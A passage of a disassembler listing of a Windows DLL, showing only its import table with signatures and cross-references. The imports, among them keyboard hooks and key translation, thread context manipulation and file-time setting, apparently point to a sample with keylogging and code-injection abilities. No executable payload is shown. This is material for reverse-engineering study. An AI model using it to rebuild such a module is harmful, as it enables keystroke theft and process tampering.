extrn lstrcatA:dword ; CODE XREF: sub_100015CE+9F�p
; sub_100020B5+1B0�p ...
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: sub_100015CE+78�p
; StartAddress+737�p ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_100015CE+71�p
; sub_10003460+9�p ...
; int __stdcall lstrcmpA(LPCSTR lpString1, LPCSTR lpString2)
extrn lstrcmpA:dword ; CODE XREF: .text:10001DBA�p
; sub_10001DE0+A5�p ...
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_100020B5+3A4�p
; sub_10003645+79�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_100020B5+38C�p
; sub_10003645+15�p ...
; HLOCAL __stdcall LocalFree(HLOCAL hMem)
extrn LocalFree:dword ; CODE XREF: sub_1000279F+C4�p
; sub_1000279F+D5�p ...
; HLOCAL __stdcall LocalAlloc(UINT uFlags, SIZE_T uBytes)
extrn LocalAlloc:dword ; CODE XREF: sub_1000279F+38�p
; sub_1001CBA7+10B�p
; DATA XREF: ...
; BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime)
extrn SetFileTime:dword ; CODE XREF: sub_1000291D+17B�p
; .text:10005BBC�p ...
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_1000291D+15C�p
; .text:10005BA6�p ...
; DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
extrn SetFilePointer:dword ; CODE XREF: sub_1000291D+144�p
; sub_1000741F+404�p ...
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn GetSystemDirectoryA:dword ; CODE XREF: sub_1000291D+77�p
; sub_10002C3D+C9�p ...
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: .text:10002B5F�p
; .text:10002C15�p ...
; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: .text:10002AF0�p
; .text:10002B43�p ...
; DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh)
extrn GetFileSize:dword ; CODE XREF: sub_100015CE+DD�p
; sub_100055F0+4A�p ...
; BOOL __stdcall Thread32First(HANDLE hSnapshot, LPTHREADENTRY32 lpte)
extrn __imp_Thread32First:dword ; DATA XREF: Thread32First�r
; HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID)
extrn __imp_CreateToolhelp32Snapshot:dword
; DATA XREF: CreateToolhelp32Snapshot�r
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: sub_10002F3C+E�p
; DATA XREF: sub_10002F3C+E�r ...
; void __stdcall ExitThread(DWORD dwExitCode)
extrn ExitThread:dword ; CODE XREF: TimerFunc+459�p
; StartAddress+902�p
; DATA XREF: ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: TimerFunc+423�p
; sub_100050D9+11D�p ...
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: TimerFunc+1BB�p
; DATA XREF: TimerFunc+1BB�r
; DWORD __stdcall GetTempPathW(DWORD nBufferLength, LPWSTR lpBuffer)
extrn GetTempPathW:dword ; CODE XREF: TimerFunc+1B5�p
; DATA XREF: TimerFunc+1B5�r
; BOOL __stdcall ResetEvent(HANDLE hEvent)
extrn ResetEvent:dword ; CODE XREF: TimerFunc+A6�p
; sub_100050D9+B0�p
; DATA XREF: ...
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: TimerFunc+49�p
; sub_100108A3+163�p ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_10003645+8C�p
; sub_10003645+CB�p ...
; LONG __stdcall InterlockedIncrement(volatile LONG *lpAddend)
extrn InterlockedIncrement:dword ; CODE XREF: sub_1000D7D0+E�p
; sub_1001361F+29�p
; DATA XREF: ...
; LONG __stdcall InterlockedDecrement(volatile LONG *lpAddend)
extrn InterlockedDecrement:dword ; CODE XREF: sub_1000D7F0+10�p
; DATA XREF: sub_1000D7F0+10�r
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: .text:10004AFA�p
; .text:10004D2A�p ...
; BOOL __stdcall SetEvent(HANDLE hEvent)
extrn SetEvent:dword ; CODE XREF: sub_100050D9+27A�p
; sub_100102E8+52�p ...
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_100015CE+FF�p
; sub_100015CE+15A�p ...
; BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName)
extrn MoveFileA:dword ; CODE XREF: .text:10005B69�p
; DATA XREF: .text:10005B69�r
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: .text:10005AFC�p
; StartAddress+8BC�p ...
; BOOL __stdcall GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime)
extrn GetFileTime:dword ; CODE XREF: .text:100058D3�p
; sub_1000B536+BF�p ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_100071C0+24F�p
; sub_1000741F+706�p ...
; BOOL __stdcall FindNextFileA(HANDLE hFindFile, LPWIN32_FIND_DATAA lpFindFileData)
extrn FindNextFileA:dword ; CODE XREF: sub_100071C0+239�p
; sub_1000741F+6F0�p ...
; BOOL __stdcall FindClose(HANDLE hFindFile)
extrn FindClose:dword ; CODE XREF: sub_100071C0+141�p
; sub_1000741F+1A2�p ...
; HANDLE __stdcall FindFirstFileA(LPCSTR lpFileName, LPWIN32_FIND_DATAA lpFindFileData)
extrn FindFirstFileA:dword ; CODE XREF: sub_100071C0+45�p
; sub_1000741F+A1�p ...
; UINT __stdcall GetDriveTypeA(LPCSTR lpRootPathName)
extrn GetDriveTypeA:dword ; CODE XREF: sub_1000878F+DF5�p
; sub_1000B7EF+665�p
; DATA XREF: ...
; DWORD __stdcall GetLogicalDrives()
extrn GetLogicalDrives:dword ; CODE XREF: sub_1000878F+D43�p
; sub_1000B7EF+5C8�p
; DATA XREF: ...
; BOOL __stdcall SetEndOfFile(HANDLE hFile)
extrn SetEndOfFile:dword ; CODE XREF: sub_10009FE2+153�p
; DATA XREF: sub_10009FE2+153�r
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName, DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: sub_1000A318+8AC�p
; sub_1000A318+95A�p ...
; DWORD __stdcall GetTempPathA(DWORD nBufferLength, LPSTR lpBuffer)
extrn GetTempPathA:dword ; CODE XREF: sub_1000A318+6CE�p
; sub_1000B7EF+AF1�p ...
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: sub_1000B027+58�p
; sub_1000B536+1F0�p
; DATA XREF: ...
; HANDLE __stdcall CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName)
extrn CreateEventA:dword ; CODE XREF: sub_1000C9DC+181�p
; DllMain(x,x,x)+204�p ...
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn GetSystemTime:dword ; CODE XREF: .text:1000E55A�p
; sub_10010623+42�p
; DATA XREF: ...
; int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2)
extrn lstrcmpiA:dword ; CODE XREF: sub_1000EB30+3A6�p
; sub_1000EB30+3CB�p ...
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: sub_1000EB30+80�p
; sub_1000EB30+A6�p
; DATA XREF: ...
; int __stdcall GetLocaleInfoA(LCID Locale, LCTYPE LCType, LPSTR lpLCData, int cchData)
extrn GetLocaleInfoA:dword ; CODE XREF: sub_1000EB30+29�p
; DATA XREF: sub_1000EB30+29�r
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection:dword ; DATA XREF: sub_1000FBCC+107�r
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection:dword ; DATA XREF: sub_1000FBCC+F1�r
; void __stdcall InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn InitializeCriticalSection:dword ; DATA XREF: sub_1000FBCC+D9�r
; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
extrn GetSystemTimeAsFileTime:dword ; DATA XREF: sub_1000FBCC+C3�r
; BOOL __stdcall SetNamedPipeHandleState(HANDLE hNamedPipe, LPDWORD lpMode, LPDWORD lpMaxCollectionCount, LPDWORD lpCollectDataTimeout)
extrn SetNamedPipeHandleState:dword ; DATA XREF: sub_1000FBCC+95�r
; BOOL __stdcall WaitNamedPipeW(LPCWSTR lpNamedPipeName, DWORD nTimeOut)
extrn WaitNamedPipeW:dword ; DATA XREF: sub_1000FBCC+7F�r
; BOOL __stdcall FlushFileBuffers(HANDLE hFile)
extrn FlushFileBuffers:dword ; DATA XREF: sub_1000FBCC+51�r
; HANDLE __stdcall CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileW:dword ; DATA XREF: sub_1000FBCC+25�r
; BOOL __stdcall CreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessW:dword ; DATA XREF: sub_1000FDDB+19�r
; DWORD __stdcall GetModuleFileNameW(HMODULE hModule, LPWCH lpFilename, DWORD nSize)
extrn GetModuleFileNameW:dword ; DATA XREF: sub_1000FDDB+3�r
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_100108A3+14E�p
; sub_10011167+117�p ...
; HANDLE __stdcall GetCurrentThread()
extrn GetCurrentThread:dword ; CODE XREF: sub_1001338E+8�p
; sub_100134D4+8�p ...
; BOOL __stdcall TlsSetValue(DWORD dwTlsIndex, LPVOID lpTlsValue)
extrn TlsSetValue:dword ; CODE XREF: sub_1001361F+15�p
; sub_1001361F+3D�p ...
; DWORD __stdcall TlsAlloc()
extrn TlsAlloc:dword ; CODE XREF: sub_100136A4+9�p
; sub_100136A4+14�p
; DATA XREF: ...
; BOOL __stdcall TlsFree(DWORD dwTlsIndex)
extrn TlsFree:dword ; CODE XREF: sub_10013713+28�p
; sub_10013713+3E�p
; DATA XREF: ...
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_10013A20+24A�p
; sub_10013A20+3D3�p
; DATA XREF: ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_10013A20+48�p
; DATA XREF: sub_10013A20+48�r
; HANDLE __stdcall GetProcessHeap()
extrn GetProcessHeap:dword ; CODE XREF: sub_10013A20+41�p
; sub_10013A20+243�p ...
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_100015CE+1E3�p
; sub_1000291D+185�p ...
; int __stdcall lstrlenA(LPCSTR lpString)
extrn lstrlenA:dword ; CODE XREF: .text:10001477�p
; .text:100014CD�p ...
; LPSTR __stdcall lstrcpyA(LPSTR lpString1, LPCSTR lpString2)
extrn lstrcpyA:dword ; CODE XREF: sub_100012D1+7C�p
; sub_100015CE+3CE�p ...
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_1000579B+C�p
; sub_1001785F:loc_100179FD�p
; DATA XREF: ...
; BOOL __stdcall Thread32Next(HANDLE hSnapshot, LPTHREADENTRY32 lpte)
extrn __imp_Thread32Next:dword ; DATA XREF: Thread32Next�r
; void __stdcall RaiseException(DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments)
extrn RaiseException:dword ; CODE XREF: sub_1001CBA7+E5�p
; sub_1001CBA7+1C7�p
; DATA XREF: ...
; LONG __stdcall InterlockedExchange(volatile LONG *Target, LONG Value)
extrn InterlockedExchange:dword ; CODE XREF: sub_1001CBA7+F7�p
; DATA XREF: sub_1001CBA7+F7�r
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_10018210:loc_1001828A�p
; sub_10018210:loc_1001830F�p ...
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: sub_10017DDC+F9�p
; sub_10017DDC+165�p
; DATA XREF: ...
; DWORD __stdcall SuspendThread(HANDLE hThread)
extrn SuspendThread:dword ; CODE XREF: sub_10017AB5+2D�p
; DATA XREF: sub_10017AB5+2D�r
; BOOL __stdcall SetThreadContext(HANDLE hThread, const CONTEXT *lpContext)
extrn SetThreadContext:dword ; CODE XREF: sub_1001785F+18C�p
; DATA XREF: sub_1001785F+102�r
; BOOL __stdcall GetThreadContext(HANDLE hThread, LPCONTEXT lpContext)
extrn GetThreadContext:dword ; CODE XREF: sub_1001785F+11C�p
; DATA XREF: sub_1001785F+11C�r
; BOOL __stdcall FlushInstructionCache(HANDLE hProcess, LPCVOID lpBaseAddress, SIZE_T dwSize)
extrn FlushInstructionCache:dword ; CODE XREF: sub_1001785F+1D7�p
; DATA XREF: sub_1001785F+1D7�r
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: sub_10017768+7B�p
; sub_1001785F+21A�p
; DATA XREF: ...
; BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)
extrn VirtualProtect:dword ; CODE XREF: sub_10017741+19�p
; sub_10017768+38�p ...
; LONG __stdcall InterlockedCompareExchange(volatile LONG *Destination, LONG Exchange, LONG Comperand)
extrn InterlockedCompareExchange:dword ; CODE XREF: sub_100176F1+18�p
; DATA XREF: sub_100176F1+18�r
; SIZE_T __stdcall VirtualQuery(LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength)
extrn VirtualQuery:dword ; CODE XREF: sub_10017656+2F�p
; sub_10017DDC+CC�p ...
;
; Imports from MSVCRT.dll
;
; __declspec(dllimport) public: virtual __thiscall type_info::~type_info(void)
extrn __imp_??1type_info@@UAE@XZ:dword
; DATA XREF: type_info::~type_info(void)�r
extrn __imp__CxxThrowException:dword ; DATA XREF: _CxxThrowException�r
; int __cdecl putc(int Ch, FILE *File)
extrn putc:dword ; CODE XREF: sub_1001B270+12�p
; sub_1001B270+39�p ...
; int __cdecl vfprintf(FILE *File, const char *Format, va_list ArgList)
extrn vfprintf:dword ; CODE XREF: sub_1001B270+27�p
; DATA XREF: sub_1001B270+27�r
; void __cdecl exit(int Code)
extrn exit:dword ; CODE XREF: sub_1001B270+40�p
; DATA XREF: sub_1001B270+40�r
; void __cdecl rewind(FILE *File)
extrn rewind:dword ; CODE XREF: sub_1001AE90+104�p
; DATA XREF: sub_1001AE90+104�r
; int __cdecl fputc(int Ch, FILE *File)
extrn fputc:dword ; CODE XREF: sub_1001AE00+66�p
; sub_1001B110+1A�p ...
; int __cdecl stricmp(const char *Str1, const char *Str2)
extrn _stricmp:dword ; CODE XREF: sub_10013A20+87�p
; DATA XREF: sub_10013A20+87�r
; char *__cdecl itoa(int Val, char *DstBuf, int Radix)
extrn _itoa:dword ; CODE XREF: sub_100139D0+3F�p
; DATA XREF: sub_100139D0+3F�r
; size_t __cdecl strlen(const char *Str)
extrn __imp_strlen:dword ; DATA XREF: strlen�r
; char *__cdecl strlwr(char *Str)
extrn _strlwr:dword ; CODE XREF: sub_100050D9+76�p
; sub_100050D9+85�p ...
; int __cdecl strnicmp(const char *Str1, const char *Str, size_t MaxCount)
extrn _strnicmp:dword ; CODE XREF: sub_1001AB59+162�p
; sub_1001AB59+173�p ...
; int __cdecl fseek(FILE *File, __int32 Offset, int Origin)
extrn fseek:dword ; CODE XREF: sub_1001A057+61�p
; sub_1001A057+9D�p ...
; __int32 __cdecl ftell(FILE *File)
extrn ftell:dword ; CODE XREF: sub_1001A057+64�p
; sub_1001AE90+7F�p ...
extrn _mbsicmp:dword ; CODE XREF: sub_10019DAA+116�p
; sub_10019DAA+169�p ...
extrn _mbsnbcmp:dword ; CODE XREF: sub_10019BC6:loc_10019C1A�p
; DATA XREF: sub_10019BC6+3F�r
extrn _mbsstr:dword ; CODE XREF: sub_1001954D+58�p
; DATA XREF: sub_1001954D+58�r
; void *__cdecl memset(void *Dst, int Val, size_t Size)
extrn __imp_memset:dword ; DATA XREF: memset�r
; void *__cdecl malloc(size_t Size)
extrn malloc:dword ; CODE XREF: sub_100010BB+B�p
; sub_100011DC+74�p ...
; char *__cdecl strchr(const char *Str, int Val)
extrn strchr:dword ; CODE XREF: sub_1000116E+3E�p
; sub_1000116E+59�p ...
; char *__cdecl strncpy(char *Dest, const char *Source, size_t Count)
extrn strncpy:dword ; CODE XREF: sub_100011DC+B3�p
; sub_100055F0+C5�p ...
extrn _adjust_fdiv:dword ; DATA XREF: _CRT_INIT(x,x,x):loc_1001748C�r
extrn __imp__initterm:dword ; DATA XREF: _initterm�r
; _onexit_t __cdecl onexit(_onexit_t Func)
extrn _onexit:dword ; CODE XREF: __onexit+D�p
; DATA XREF: __onexit+D�r
extrn __imp___dllonexit:dword ; DATA XREF: __dllonexit�r
; int __cdecl strncmp(const char *Str1, const char *Str2, size_t MaxCount)
extrn strncmp:dword ; CODE XREF: sub_10016C4C+33F�p
; sub_10016C4C+35A�p ...
extrn _iob:dword ; DATA XREF: sub_100142FF+BA�r
; sub_1001AE90+1F�r ...
; int fprintf(FILE *File, const char *Format, ...)
extrn fprintf:dword ; CODE XREF: sub_100142FF+C3�p
; sub_1001AE90+32�p ...
; int printf(const char *Format, ...)
extrn printf:dword ; CODE XREF: sub_10013E02+19D�p
; sub_10013E02+1D4�p ...
; int sscanf(const char *Src, const char *Format, ...)
extrn sscanf:dword ; CODE XREF: sub_10013A20+72�p
; DATA XREF: sub_10013A20+72�r
; void *__cdecl realloc(void *Memory, size_t NewSize)
extrn realloc:dword ; CODE XREF: sub_10010623+1C6�p
; sub_100108A3+111�p ...
extrn _except_handler3:dword ; DATA XREF: .text:loc_10017470�r
; time_t __cdecl time(time_t *Time)
extrn time:dword ; CODE XREF: .text:10005817�p
; StartAddress+DB�p ...
; void __cdecl srand(unsigned int Seed)
extrn srand:dword ; CODE XREF: .text:10005821�p
; StartAddress+E5�p ...
; int __cdecl isalpha(int C)
extrn isalpha:dword ; CODE XREF: sub_10003786+FB9�p
; DATA XREF: sub_10003786+FB9�r
; int __cdecl isdigit(int C)
extrn isdigit:dword ; CODE XREF: sub_10003786+1039�p
; sub_1000F5B1+DC�p
; DATA XREF: ...
; size_t __cdecl wcslen(const wchar_t *Str)
extrn __imp_wcslen:dword ; CODE XREF: TimerFunc+24D�p
; sub_10012894+D9�p ...
; void *__cdecl memcpy(void *Dst, const void *Src, size_t Size)
extrn __imp_memcpy:dword ; DATA XREF: memcpy�r
; int __cdecl atoi(const char *Str)
extrn atoi:dword ; CODE XREF: sub_10002C3D+1BF�p
; sub_10003786+EF1�p ...
; __declspec(dllimport) void * __cdecl operator new(unsigned int)
extrn __imp_??2@YAPAXI@Z:dword ; DATA XREF: operator new(uint)�r
; void *__cdecl calloc(size_t NumOfElements, size_t SizeOfElements)
extrn calloc:dword ; CODE XREF: .text:10002B22�p
; .text:10002BD8�p
; DATA XREF: ...
; __declspec(dllimport) void __cdecl operator delete(void *)
extrn __imp_??3@YAXPAX@Z:dword ; DATA XREF: operator delete(void *)�r
; int __cdecl wcscmp(const wchar_t *Str1, const wchar_t *Str2)
extrn wcscmp:dword ; CODE XREF: sub_1000279F+8F�p
; DATA XREF: sub_1000279F+8F�r
; void *__cdecl memmove(void *Dst, const void *Src, size_t Size)
extrn memmove:dword ; CODE XREF: sub_10019167+4E�p
; sub_100191E6+87�p ...
extrn _mbsnbicmp:dword ; CODE XREF: sub_10018E33+8C�p
; sub_10018E33+1A5�p ...
extrn __imp__EH_prolog:dword ; DATA XREF: _EH_prolog�r
; size_t __cdecl fwrite(const void *Str, size_t Size, size_t Count, FILE *File)
extrn fwrite:dword ; CODE XREF: sub_10018AC6+C3�p
; sub_10018AC6+12C�p ...
; char *__cdecl strstr(const char *Str, const char *SubStr)
extrn strstr:dword ; CODE XREF: sub_100011DC+40�p
; sub_100012D1+48�p ...
; char *__cdecl strcat(char *Dest, const char *Source)
extrn __imp_strcat:dword ; DATA XREF: strcat�r
; void __cdecl free(void *Memory)
extrn free:dword ; CODE XREF: sub_100015CE+214�p
; sub_100015CE+715�p ...
; char *__cdecl strrchr(const char *Str, int Ch)
extrn strrchr:dword ; CODE XREF: sub_100015CE+87�p
; StartAddress+746�p ...
; int __cdecl strcmp(const char *Str1, const char *Str2)
extrn __imp_strcmp:dword ; DATA XREF: strcmp�r
; char *__cdecl strcpy(char *Dest, const char *Source)
extrn __imp_strcpy:dword ; DATA XREF: strcpy�r
; int sprintf(char *Dest, const char *Format, ...)
extrn sprintf:dword ; CODE XREF: sub_100020B5+22C�p
; sub_100020B5+251�p ...
extrn __imp___CxxFrameHandler:dword ; DATA XREF: __CxxFrameHandler�r
; FILE *__cdecl fopen(const char *Filename, const char *Mode)
extrn fopen:dword ; CODE XREF: sub_100189B8+12�p
; sub_10018AC6+41�p ...
; size_t __cdecl fread(void *DstBuf, size_t ElementSize, size_t Count, FILE *File)
extrn fread:dword ; CODE XREF: sub_100189B8+5A�p
; sub_1001A057+B2�p ...
; int __cdecl fclose(FILE *File)
extrn fclose:dword ; CODE XREF: sub_100189B8+C0�p
; sub_10018AC6+219�p ...
; int __cdecl rand()
extrn rand:dword ; CODE XREF: sub_1000274A+33�p
; sub_100139D0:loc_100139D5�p ...
; char *__cdecl strncat(char *Dest, const char *Source, size_t Count)
extrn strncat:dword ; CODE XREF: sub_100010BB+A1�p
; sub_100012D1+EB�p ...
;
; Imports from OLEAUT32.dll
;
; UINT __stdcall SysStringByteLen(BSTR bstr)
extrn SysStringByteLen:dword ; CODE XREF: sub_1000DC10+32�p
; DATA XREF: sub_1000DC10+32�r
; BSTR __stdcall SysAllocStringByteLen(LPCSTR psz, UINT len)
extrn SysAllocStringByteLen:dword ; CODE XREF: sub_1000DC10+3D�p
; DATA XREF: sub_1000DC10+3D�r
; HRESULT __stdcall VariantClear(VARIANTARG *pvarg)
extrn VariantClear:dword ; CODE XREF: sub_1000DA70+B�p
; sub_1000DAE0+B�p ...
; void __stdcall VariantInit(VARIANTARG *pvarg)
extrn VariantInit:dword ; CODE XREF: sub_1000DA10+B�p
; DATA XREF: sub_1000DA10+B�r
; HRESULT __stdcall VariantCopy(VARIANTARG *pvargDest, const VARIANTARG *pvargSrc)
extrn VariantCopy:dword ; CODE XREF: sub_1000DA10+19�p
; DATA XREF: sub_1000DA10+19�r
; void __stdcall SysFreeString(BSTR bstrString)
extrn SysFreeString:dword ; CODE XREF: sub_1000D9D0+17�p
; DATA XREF: sub_1000D9D0+17�r
; UINT __stdcall SysStringLen(BSTR)
extrn SysStringLen:dword ; CODE XREF: sub_1000D8C0+37�p
; sub_1000D8C0+46�p
; DATA XREF: ...
; HRESULT __stdcall GetErrorInfo(ULONG dwReserved, IErrorInfo **pperrinfo)
extrn GetErrorInfo:dword ; CODE XREF: sub_1001C8FE+44�p
; DATA XREF: sub_1001C8FE+44�r
; BSTR __stdcall SysAllocString(const OLECHAR *psz)
extrn SysAllocString:dword ; CODE XREF: sub_1001C99D+66�p
; DATA XREF: sub_1001C99D+66�r
;
; Imports from Secur32.dll
;
; SECURITY_STATUS __stdcall DecryptMessage(PCtxtHandle phContext, PSecBufferDesc pMessage, unsigned __int32 MessageSeqNo, unsigned __int32 *pfQOP)
extrn __imp_DecryptMessage:dword ; DATA XREF: DecryptMessage�r
; SECURITY_STATUS __stdcall EncryptMessage(PCtxtHandle phContext, unsigned __int32 fQOP, PSecBufferDesc pMessage, unsigned __int32 MessageSeqNo)
extrn __imp_EncryptMessage:dword ; DATA XREF: EncryptMessage�r
;
; Imports from USER32.dll
;
; BOOL __stdcall IsWindowVisible(HWND hWnd)
extrn IsWindowVisible:dword ; CODE XREF: fn+7�p
; DATA XREF: fn+7�r
; BOOL __stdcall EnumThreadWindows(DWORD dwThreadId, WNDENUMPROC lpfn, LPARAM lParam)
extrn EnumThreadWindows:dword ; CODE XREF: sub_10002F3C+73�p
; DATA XREF: sub_10002F3C+73�r
; int wsprintfW(LPWSTR, LPCWSTR, ...)
extrn wsprintfW:dword ; CODE XREF: TimerFunc+1DA�p
; DATA XREF: TimerFunc+1DA�r
; BOOL __stdcall KillTimer(HWND hWnd, UINT_PTR uIDEvent)
extrn KillTimer:dword ; CODE XREF: TimerFunc+97�p
; sub_1000AF7F+B�p
; DATA XREF: ...
; BOOL __stdcall UnhookWindowsHookEx(HHOOK hhk)
extrn UnhookWindowsHookEx:dword ; CODE XREF: TimerFunc+68�p
; TimerFunc+7F�p ...
; HHOOK __stdcall SetWindowsHookExA(int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId)
extrn SetWindowsHookExA:dword ; CODE XREF: sub_10003460+3E�p
; sub_1000537C+170�p ...
; DWORD __stdcall GetWindowThreadProcessId(HWND hWnd, LPDWORD lpdwProcessId)
extrn GetWindowThreadProcessId:dword ; CODE XREF: sub_10003460+2C�p
; .text:10004AF3�p ...
; LRESULT __stdcall CallNextHookEx(HHOOK hhk, int nCode, WPARAM wParam, LPARAM lParam)
extrn CallNextHookEx:dword ; CODE XREF: sub_10003541+9D�p
; sub_10003541+B8�p ...
; LRESULT __stdcall SendMessageTimeoutA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam, UINT fuFlags, UINT uTimeout, PDWORD_PTR lpdwResult)
extrn SendMessageTimeoutA:dword ; CODE XREF: sub_10003645+5A�p
; DATA XREF: sub_10003645+5A�r
; UINT __stdcall RegisterWindowMessageA(LPCSTR lpString)
extrn RegisterWindowMessageA:dword ; CODE XREF: sub_10003645+37�p
; sub_1000C9DC+14E�p
; DATA XREF: ...
; BOOL __stdcall ScreenToClient(HWND hWnd, LPPOINT lpPoint)
extrn ScreenToClient:dword ; CODE XREF: sub_10003786+CF8�p
; DATA XREF: sub_10003786+CF8�r
; BOOL __stdcall GetCursorPos(LPPOINT lpPoint)
extrn GetCursorPos:dword ; CODE XREF: sub_10003786+CE4�p
; sub_10004960+44�p
; DATA XREF: ...
; int __stdcall ToAsciiEx(UINT uVirtKey, UINT uScanCode, const BYTE *lpKeyState, LPWORD lpChar, UINT uFlags, HKL dwhkl)
extrn ToAsciiEx:dword ; CODE XREF: .text:10004B56�p
; sub_10004DAA+F0�p
; DATA XREF: ...
; HKL __stdcall GetKeyboardLayout(DWORD idThread)
extrn GetKeyboardLayout:dword ; CODE XREF: .text:10004B24�p
; sub_10004DAA+BE�p
; DATA XREF: ...
; HWND __stdcall GetAncestor(HWND hwnd, UINT gaFlags)
extrn __imp_GetAncestor:dword ; DATA XREF: GetAncestor�r
; BOOL __stdcall AttachThreadInput(DWORD idAttach, DWORD idAttachTo, BOOL fAttach)
extrn AttachThreadInput:dword ; CODE XREF: .text:10004B01�p
; .text:10004D31�p ...
; HWND __stdcall GetForegroundWindow()
extrn GetForegroundWindow:dword ; CODE XREF: .text:10004AB2�p
; .text:10004B16�p ...
; int __stdcall DrawTextW(HDC hdc, LPCWSTR lpchText, int cchText, LPRECT lprc, UINT format)
extrn DrawTextW:dword ; CODE XREF: sub_10004DAA+295�p
; DATA XREF: sub_10004DAA+295�r
; int wsprintfA(LPSTR, LPCSTR, ...)
